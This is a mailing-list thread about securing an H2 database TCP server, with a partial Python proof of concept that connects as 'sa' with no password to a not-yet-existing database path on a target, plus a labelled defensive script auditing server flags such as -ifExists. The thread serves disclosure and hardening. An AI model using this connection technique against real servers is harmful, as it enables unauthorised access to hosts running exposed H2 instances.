Agreed, it's best to have secure defaults. Thanks!
On Friday, November 2, 2018 at 2:06:55 AM UTC-4, Noel Grandin wrote:
>
> It's not unreasonable to make downstream users safer by making -ifExists
> the default for the TCP server mode.
>
Thanks Evgenij, these config settings should take care of the problem for me
On Thursday, November 1, 2018 at 11:35:41 PM UTC-4, Evgenij Ryazanov wrote:
>
> Hello.
>
> Add -ifExists flag to your TCP server.
> http://www.h2database.com/html/advanced.html#remote_access
> You should not run TCP / Web
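Added example (not code from the thread or from the H2 project): a small Python script that audits an org.h2.tools.Server command line for the settings discussed in this thread, namely a TCP listener without -ifExists (remote database creation allowed), -tcpAllowOthers (listener reachable from other hosts), a missing -baseDir (clients may name any path the server can write, as the absolute path in the POC does), and an enabled web console. The option names are those documented on the remote_access page linked above; the two sample command lines, the jar file name and the /srv/h2 directory are constructed for the example.

```python
"""Audit an H2 org.h2.tools.Server command line for unsafe remote-access settings.

Added example, not part of the H2 project. Sample command lines below are
constructed; the jar name and base directory are assumptions.
"""
import shlex

# Constructed samples: the weak configuration and the hardened one.
WEAK_CMD = ("java -cp h2-1.4.197.jar org.h2.tools.Server "
            "-tcp -tcpAllowOthers -tcpPort 9092")
HARDENED_CMD = ("java -cp h2-1.4.197.jar org.h2.tools.Server "
                "-tcp -ifExists -baseDir /srv/h2 -tcpPort 9092")


def parse_server_args(cmdline):
    """Return the org.h2.tools.Server options from a full java command line."""
    argv = shlex.split(cmdline)
    try:
        start = argv.index("org.h2.tools.Server") + 1
    except ValueError:
        raise ValueError("not an org.h2.tools.Server command line")
    return argv[start:]


def option_set(args):
    """Map each -flag to its value: the next token when that token is not
    itself a flag (e.g. -tcpPort 9092), otherwise True (e.g. -ifExists)."""
    opts = {}
    i = 0
    while i < len(args):
        tok = args[i]
        if tok.startswith("-"):
            nxt = args[i + 1] if i + 1 < len(args) else None
            if nxt is not None and not nxt.startswith("-"):
                opts[tok] = nxt
                i += 2
            else:
                opts[tok] = True
                i += 1
        else:
            i += 1
    return opts


def audit(cmdline):
    """Return a list of findings; an empty list means no flagged setting."""
    opts = option_set(parse_server_args(cmdline))
    findings = []
    if "-tcp" in opts:
        if "-ifExists" not in opts:
            findings.append("TCP: remote database creation allowed; add -ifExists")
        if "-tcpAllowOthers" in opts:
            findings.append("TCP: listener accepts connections from other hosts (-tcpAllowOthers)")
        if "-baseDir" not in opts:
            findings.append("TCP: no -baseDir; clients may name any path the server process can write")
    if "-web" in opts:
        if "-webAllowOthers" in opts:
            findings.append("Web console: exposed to other hosts (-webAllowOthers)")
        else:
            findings.append("Web console enabled; do not run it outside a test environment")
    return findings


if __name__ == "__main__":
    for label, cmd in (("weak", WEAK_CMD), ("hardened", HARDENED_CMD)):
        print(label, cmd)
        for finding in audit(cmd) or ["no findings"]:
            print("  -", finding)
```

Feed it the command line of a running server (for example the matching line from ps output, or the ExecStart of a service unit) and treat any finding under "TCP" as the condition the POC in this thread relies on.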
If I understand correctly, you don't need to know that - since I'm
referencing a database that does not yet exist ("C:\\Windows\\Temp\\exploit")
I can get away with specifying default credentials - "sa" with no password.
And that is what actually caused my original question - how can we secure
Here's a small Python POC:
- Windows-based (feel free to tweak for *nix)
- Requires jaydebeapi (run "pip install jaydebeapi")
- Assumes javac is in the system path (so does the original POC)

import jaydebeapi

SERVER = "SERVER_TO_EXPLOIT"

# Connect as "sa" with an empty password to a database that does not exist
# yet; without -ifExists the server creates it. The connection string is
# completed from the description above; the statements executed over conn
# are not preserved in this copy of the thread.
conn = jaydebeapi.connect("org.h2.Driver",
                          "jdbc:h2:tcp://%s/C:\\Windows\\Temp\\exploit" % SERVER,
                          ["sa", ""])
Unfortunately, no - I rewrote it to go through JDBC and it still works...
On Thursday, November 1, 2018 at 12:35:20 PM UTC-4, Noel Grandin wrote:
>
> That exploit is about the web console. Do not enable the console outside
> of a testing environment and you will be fine.
>
recommended remediation for this? Is there a code fix planned?
If it can be prevented through configuration changes, can the appropriate
configuration setting be made the default?
Thanks!
0xd13a
--
You received this message because you are subscribed to the Google Groups "H2
Database"